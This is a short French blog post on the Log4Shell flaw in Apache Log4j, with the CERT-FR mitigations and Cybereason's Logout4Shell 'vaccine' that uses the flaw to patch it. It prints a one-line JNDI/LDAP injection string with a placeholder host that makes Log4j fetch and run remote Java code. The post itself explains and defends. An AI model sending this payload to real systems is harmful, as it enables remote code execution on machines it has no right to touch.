Un vaccin pour la faille Log4Shell

Si vous êtes un peu intéressé par la sécurité informatique, il ne vous aura pas échappé que le 9 décembre, une faille 0day affectant Apache Log4j avait été divulguée. Baptisée Log4Shell, cette faille qui affecte log4j de la version 2.0 à 2.14.1 a obtenu un score CVSS de 10/10 en termes de gravité.

Waouh.

Il transpire beaucoup partout, d’autant plus que la faille est actuellement utilisée partout. Pour faire court, il suffit de passer les caractères suivants dans les logs analysés par log4j.

${jndi:ldap://URL.com/FICHIER_JAVA}

et cela aura pour effet de télécharger et d’exécuter le fichier java qui se trouve à la fin de l’url « URL.com/FICHIER_JAVA ». C’est aussi simple que dramatique.

Il y a beaucoup de littérature à ce sujet, notamment du côté du CERT-FR donc je ne m’étendrai pas sur le sujet, mais un projet Github intéressant et amusant est né de tout ce bordel.

Comme vous le savez, pour patcher cette vulnérabilité Log4Shell (CVE-2021-44228), il est urgent de mettre à jour log4j vers une version> = 2.15.0.

Et si ce n’est pas possible :

Pour les applications utilisant les versions 2.10.0 et supérieures de la bibliothèque log4j, il est également possible de se prémunir contre toute attaque en modifiant le paramètre de configuration log4j2.formatMsgNoLookups à la valeur vrai, par exemple lors du lancement de la machine virtuelle Java avec l’option -Dlog4j2.formatMsgNoLookups=true. Une autre alternative est de supprimer la classe JndiRecherche dans le paramètre chemin de classe éliminer le vecteur d’attaque principal (les chercheurs n’excluent pas l’existence d’un autre vecteur d’attaque).

Cert FR

Mais une autre possibilité est de laisser la nature suivre son cours et c’est ce que propose Cybereason avec ce code nommé Logout4Shell qui exploite la vulnérabilité Log4Shell pour… tout simplement la patcher.

Le payload qui est chargé via la faille forcera l’enregistreur Log4j à se reconfigurer pour basculer le paramètre qui passe bien à True et empêchera ainsi toute exploitation ultérieure via cette attaque.

A voir également  Firefox en panne – Comment régler le soucis ?

C’est une sorte de cyber vaccin en attendant une vraie mise à jour de Log4j.

Si vous êtes intéressé, le code est disponible sur Github.

Bonne chance aux personnes impactées.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.

Retour haut de page